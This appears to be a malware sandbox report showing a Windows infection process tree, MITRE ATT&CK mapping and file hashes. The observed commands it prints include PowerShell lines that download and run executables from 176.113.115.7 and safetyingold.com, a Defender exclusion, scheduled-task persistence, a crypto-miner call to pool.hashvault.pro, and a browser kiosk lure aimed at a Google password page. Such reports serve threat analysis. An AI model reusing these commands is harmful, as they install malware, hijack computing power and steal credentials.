C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemHelperTask" /tr "C:\Users\Admin\AppData\Local\Temp\10215600101\packed.exe" /sc onlogon /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:2820
-
-
C:\Program Files\RuntimeApp\0000009092.exe"C:\Program Files\RuntimeApp\0000009092.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2892
-
-
-
C:\Users\Admin\AppData\Local\Temp\10216190101\b0hgYat.exe"C:\Users\Admin\AppData\Local\Temp\10216190101\b0hgYat.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1756 -
C:\Users\Admin\AppData\Local\Temp\10216190101\b0hgYat.exe"C:\Users\Admin\AppData\Local\Temp\10216190101\b0hgYat.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1696
-
-
-
C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe"C:\Users\Admin\AppData\Local\Temp\10217320101\Esu6YYl.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2088 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -inputformat none -outputformat none -NonInteractive -Command Add -MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Updater"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1572
-
-
C:\Windows\system32\schtasks.exe"schtasks" /Create /SC ONLOGON /RL HIGHEST /TN "Updater" /TR "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe" /F6⤵
- Scheduled Task/Job: Scheduled Task
PID:2080
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C ping 127.0.0.1 -n 3 > nul && start "" "C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"6⤵
- Loads dropped DLL
- System Network Configuration Discovery: Internet Connection Discovery
PID:872 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 37⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1400
-
-
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1548 -
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exeC:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe curl.dll8⤵
- Executes dropped EXE
PID:2536
-
-
C:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exeC:\Users\Admin\AppData\Roaming\Updater\Esu6YYl.exe --url pool.hashvault.pro:443 --user 4AzoDsqqcueLbpDUZn5LUYA6JeJ61CWW51bdL9UsCNLKc4wq8BZxBuTPZPQDcMfxZPRRu643zHB5fXjgc9sGwELjQt7Tkxs --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b148⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:800
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe"C:\Users\Admin\AppData\Local\Temp\10219920101\O9s3coZ.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1712 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1712 -s 1806⤵
- Loads dropped DLL
PID:2964
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe"C:\Users\Admin\AppData\Local\Temp\10222660101\j21Hq7C.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1424 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1424 -s 1806⤵
- Loads dropped DLL
PID:568
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222710101\400f34b24d.exe"C:\Users\Admin\AppData\Local\Temp\10222710101\400f34b24d.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:772 -
C:\Users\Admin\AppData\Local\Temp\SAU9CL9T4LCM8EX1AEI8AP2BQI.exe"C:\Users\Admin\AppData\Local\Temp\SAU9CL9T4LCM8EX1AEI8AP2BQI.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2460
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222720101\a47cfd9534.exe"C:\Users\Admin\AppData\Local\Temp\10222720101\a47cfd9534.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:700
-
-
C:\Users\Admin\AppData\Local\Temp\10222730101\79704c4279.exe"C:\Users\Admin\AppData\Local\Temp\10222730101\79704c4279.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2216 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:2468
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
PID:3028 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.0.1174445238\266119282" -parentBuildID 20221007134813 -prefsHandle 1236 -prefMapHandle 1112 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e535af16-3b2c-4548-93c4-9f32ff5e4b9b} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 1348 106d6a58 gpu8⤵PID:2140
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.1.1280560757\1779558659" -parentBuildID 20221007134813 -prefsHandle 1532 -prefMapHandle 1528 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {81903a30-17e5-42c5-94b3-8568753f68c8} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 1560 f4eb558 socket8⤵PID:408
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.2.1258258265\1483581124" -childID 1 -isForBrowser -prefsHandle 2004 -prefMapHandle 2000 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a575873a-673a-4d84-9373-8ebef6f15e9c} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 2016 1935cf58 tab8⤵PID:864
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.3.1902900574\1786330313" -childID 2 -isForBrowser -prefsHandle 2604 -prefMapHandle 2592 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7ce6b7a-37b6-40ba-9fa8-def9391ffaa3} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 2616 1acce458 tab8⤵PID:3040
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.4.2003793953\107605765" -childID 3 -isForBrowser -prefsHandle 3592 -prefMapHandle 3684 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {923f6f81-d5b5-43d6-b120-0bca19b62d6d} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 3720 3f36f58 tab8⤵PID:2200
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.5.1056933089\592115763" -childID 4 -isForBrowser -prefsHandle 3828 -prefMapHandle 3832 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1a52280-8e31-4e99-85b0-8ac20bcf90c9} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 3816 3f34558 tab8⤵PID:2152
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.6.838119302\744785716" -childID 5 -isForBrowser -prefsHandle 3992 -prefMapHandle 3996 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bf7039da-b232-41e6-8c7c-91ff4d72e0ba} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 3980 3f36058 tab8⤵PID:2800
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222740101\7f23b4fca3.exe"C:\Users\Admin\AppData\Local\Temp\10222740101\7f23b4fca3.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2844 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 8006⤵
- Program crash
PID:1164
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222750101\97c390f6c8.exe"C:\Users\Admin\AppData\Local\Temp\10222750101\97c390f6c8.exe"5⤵PID:3588
-
-
C:\Users\Admin\AppData\Local\Temp\10222760101\fcaefc77e9.exe"C:\Users\Admin\AppData\Local\Temp\10222760101\fcaefc77e9.exe"5⤵PID:3816
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn qoRQamaxbnl /tr "mshta C:\Users\Admin\AppData\Local\Temp\aQhHFQUkT.hta" /sc minute /mo 25 /ru "Admin" /f6⤵PID:3836
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn qoRQamaxbnl /tr "mshta C:\Users\Admin\AppData\Local\Temp\aQhHFQUkT.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:3904
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\aQhHFQUkT.hta6⤵PID:3844
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RLEMVCHJQGCOFKRORYILDBJF1YQ5RHU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Command and Scripting Interpreter: PowerShell
PID:3920 -
C:\Users\Admin\AppData\Local\TempRLEMVCHJQGCOFKRORYILDBJF1YQ5RHU1.EXE"C:\Users\Admin\AppData\Local\TempRLEMVCHJQGCOFKRORYILDBJF1YQ5RHU1.EXE"8⤵PID:4012
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10222770121\am_no.cmd" "5⤵PID:2304
-
C:\Windows\SysWOW64\timeout.exetimeout /t 26⤵
- Delays execution with timeout.exe
PID:3156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵PID:3128
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
PID:3292
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵PID:3412
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
PID:3420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵PID:3484
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
PID:3492
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "EM9RnmaNX4D" /tr "mshta \"C:\Temp\cwiYK8V3f.hta\"" /sc minute /mo 25 /ru "Admin" /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:3736
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\cwiYK8V3f.hta"6⤵PID:3776
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Command and Scripting Interpreter: PowerShell
PID:3840 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"8⤵PID:2188
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222780101\j21Hq7C.exe"C:\Users\Admin\AppData\Local\Temp\10222780101\j21Hq7C.exe"5⤵PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\10222790101\b0hgYat.exe"C:\Users\Admin\AppData\Local\Temp\10222790101\b0hgYat.exe"5⤵PID:3372
-
C:\Users\Admin\AppData\Local\Temp\10222790101\b0hgYat.exe"C:\Users\Admin\AppData\Local\Temp\10222790101\b0hgYat.exe"6⤵PID:2228
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222800101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10222800101\ADFoyxP.exe"5⤵PID:3468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c "Invoke-WebRequest -Uri 'https://safetyingold.com/share/4822aa372544ea4642142339b22d22421d08bdb543cd2de334b3fd0e5fc07565.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Microsoft\Protect\rsfff01fff.exe' -Headers @{'User-Agent'='build2'}"6⤵
- Command and Scripting Interpreter: PowerShell
PID:3416
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222810101\9JFiKVm.exe"C:\Users\Admin\AppData\Local\Temp\10222810101\9JFiKVm.exe"5⤵PID:3832
-
-
C:\Users\Admin\AppData\Local\Temp\10222820101\packed.exe"C:\Users\Admin\AppData\Local\Temp\10222820101\packed.exe"5⤵PID:3956
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=6⤵
- Command and Scripting Interpreter: PowerShell
PID:2032
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemHelperTask" /tr "C:\Users\Admin\AppData\Local\Temp\10222820101\packed.exe" /sc onlogon /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
PID:3228
-
-
C:\Program Files\RuntimeApp\0000009559.exe"C:\Program Files\RuntimeApp\0000009559.exe"6⤵PID:3348
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222830101\O9s3coZ.exe"C:\Users\Admin\AppData\Local\Temp\10222830101\O9s3coZ.exe"5⤵PID:2616
-
-
C:\Users\Admin\AppData\Local\Temp\10222840101\v6Oqdnc.exe"C:\Users\Admin\AppData\Local\Temp\10222840101\v6Oqdnc.exe"5⤵PID:3444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3444 -s 12846⤵
- Program crash
PID:3164
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222850101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10222850101\HmngBpR.exe"5⤵PID:3972
-
C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe6⤵PID:3888
-
C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe7⤵PID:3360
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe8⤵PID:3752
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe9⤵PID:3228
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222860101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10222860101\zY9sqWs.exe"5⤵PID:3292
-
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"6⤵PID:2460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\10000910261\Bthvgkck\'7⤵
- Command and Scripting Interpreter: PowerShell
PID:2856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exe"C:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exe"5⤵PID:1596
-
C:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exeC:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exe curl.dll6⤵PID:4048
-
-
C:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exeC:\Users\Admin\AppData\Local\Temp\10222870101\Esu6YYl.exe --url pool.hashvault.pro:443 --user 4AzoDsqqcueLbpDUZn5LUYA6JeJ61CWW51bdL9UsCNLKc4wq8BZxBuTPZPQDcMfxZPRRu643zHB5fXjgc9sGwELjQt7Tkxs --pass x --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b146⤵PID:3876
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2x8387.exe3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\93R1PJ3LML991IHAH15X.exe"C:\Users\Admin\AppData\Local\Temp\93R1PJ3LML991IHAH15X.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2052
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3r19R.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1516
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Discovery
Browser Information Discovery
1Query Registry
7Remote System Discovery
1System Information Discovery
4System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\activity-stream.discovery_stream.json.tmp
Filesize26KB
MD5d1bf64b60125dd33574cead57388d988
SHA163fd1b9c1ed168ebb93e75c4de1d569b0b016f31
SHA25686d4818f13f29936b70026e61874772631a7bfc6c4848e2ea9c59e4dc7abf5af
SHA5122a4ba076160af6fecd2da2ed926dfa6907f32d69a1edf6fec64bc937521e395b66760274a91ad7b495972886348e7a9acbabb8fba66df2e9f5f9e1e0ea3ba6cb
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
669KB
MD5963a766b3b8d33b4f0471c74b9cbec7c
SHA1e342e54e02d430c2c5413d85d775c696fe1289f8
SHA2567986641712e76a0b74fe66dce29d9bd7d3f37cf9f70e91424fa38d51a2297bba
SHA512cc75571ca52a54471dc43359d7ab984898c90f634c73a24d32a7bd9ac632763b679a876e87b292cb33327eac50640d0b6383473f669a8035a50f048a34ef8b38
-
Filesize
479KB
MD525f00b7c2ff3ae44d849863c1e47b096
SHA190203d582817c0b1e0778e53ab8ef63c2505d912
SHA2560a7602edc5309eb0683609f1e54bc11052e046b2b3f61f64397526fa935d7c6d
SHA512144af31085439aabccd2502e3999de5952e58b708ccc9b8254381caf74130bec801f67a55c06614814a311b3093cdc88ebddc63508557b2157c0b15f88f23a15
-
Filesize
6.1MB
MD52188546b6cf8cb7ac5e86971bbdcb162
SHA12f2b046e363dc151363e992db99cb796d73065e4
SHA2564d9a7bd2e38992896c29e87c4f9e98cbd67fbdb10176132a5f4980a502dd314d
SHA512f22662ce1f3b7413dd93b547f4a401edaf5c181de478340b9a3459586bc2c08379467c610e526f482f3e3d951394b845fea47fe8d3064b5f3ff5a6f8a192e84f
-
Filesize
17.9MB
MD52b02bcc4b6c3dd867349af718fa6cd92
SHA10a4711efa9ae7c75024bb6644b900e6329e2c378
SHA25641fdc5fd55f5488d971dba6851ebdc2fb46e68b9df2611e1928bee983f5d2746
SHA512f657a2d020be45051578e999db74f5269abf88ca25eb3e19fb52ab47f311de48d7224233f83de29d05ca192a4cb73dcaeab922f5a815a22f9dd89367f840a103
-
Filesize
7.1MB
MD5a99f280eeda0161416cd8f57a1919071
SHA11a1028069ae016ad61a9e237b6ad931fd3f047e1
SHA25641563f3ed118c57d8028a0bbd7d7bff8a8bddb87959ba99af253e4c64151de18
SHA512699904a78879454ffa5ebd584f69e3bd5cbad20f8310a9acaf2a8ed53c9d0ea57e2c345e93ac3d15d5ea5042503789ee64d330dc63c1979e31fc523e92819095
-
Filesize
479KB
MD5145dc550875d5ffce1b981c2fe9ad4a7
SHA1861cc422292d3140899f8b09b2f7d5dc22abc13b
SHA2569434b94ac39370d5b6dee2865dcb709d02030815a40841478882c853ab1dd860
SHA512b3e957dc9b6a5d653bde2ff600687b72011bc1488c85a5aebcb1400e671326ce5aaadfb746697ad4b8f3288f192f8fe92916491d4bfcbd546415d16704e3bf65
-
Filesize
481KB
MD568737830ccac68b750f9246d62f1919a
SHA149468c0a9a2d6f892ce1b5a420cb068ce79b3aae
SHA256e55905651f4bd797fff5f572f76a8da1359e9e3416ce9a93dd3a214fbdb2e47a
SHA5121ba6a105fe9b516b4eb112149414362263f54f5346a1f7e94afe9cc635f93cd9afcda7c638181f2a593e3a901274340388d599a930af8385e4d1f120571d7331
-
Filesize
943KB
MD57b263841e989d2a9f7d156e74cb36e6f
SHA1daf7c46fc057c7e3dc266faacf89652cc1cf9720
SHA2566457881894861cb853a08b65e3b63b2916f317ce6730338f0508cf84f5f930e8
SHA512b5a569ddbaf01806babcb1676dd4d74ea94e3253c4a803fa70c2cba0ba456e20a943049dd54cdcf39b51fb30b65fe9ca812a047bf65a043c02c53c9649317ee1
-
Filesize
1.7MB
MD5ce7fdac9a0dfd437a3f2204c612284e2
SHA1c2f8930cf6a7e714c524bcd0278c338e8fe6548f
SHA2561b33dec35c3b0a4d0dbad1bcbace4dd4e80a662f2eeae7e68edc27b863113c33
SHA512ff24c3763053417ee0271d7e79fe7a7b92a194bf5fc179ef9f6b8506b487493d8b252517176d9526042ad738719aa1dc5284bfb54e5abcbe318f1ae007f7626b
-
Filesize
2.0MB
MD5fe574002bc9fde6c7f1b1ecad8cc8cec
SHA1a6e37f4b701611341d8b482e8f5a999e8ca34eb0
SHA2564ca12a7e44e88be3ef1f044eb7e4770e492c81be29015f8c9203c24fd97a7288
SHA512f2ac9e7d99dc050b22bdf83c1840c635bc3d23bb0e9b82cfe3aacdaeef1426a688a44714818127814c4559b31bda650b3e4dc0226316d110794e3e008ee7e22d
-
Filesize
938KB
MD5d7dcdd913bd35547bec8cfcee2bdf4ea
SHA11494afb246db82becbd7000ed3761315f892673d
SHA25652255ef95a5cfa309e10a6a7ddc22140ca74f399d04097e6d498df078a6c79a2
SHA512ac0745c8fb3b8b074314841b391dcaa060182e52c762dad8207aaa43bb512150ff0b12ecb3d08b8576b208cd14b7b6fa6ecaed04947e647b93318e13c4bfbb29
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
143KB
MD5dfa1f9ab10898a049f611d44a2c727d6
SHA1829dd10cc064690c9296889e328cdb29c0880e1f
SHA256861b833dca0b5c2322185fed31cca4ebabd33a691ecdfd640b41ed7dd46ee628
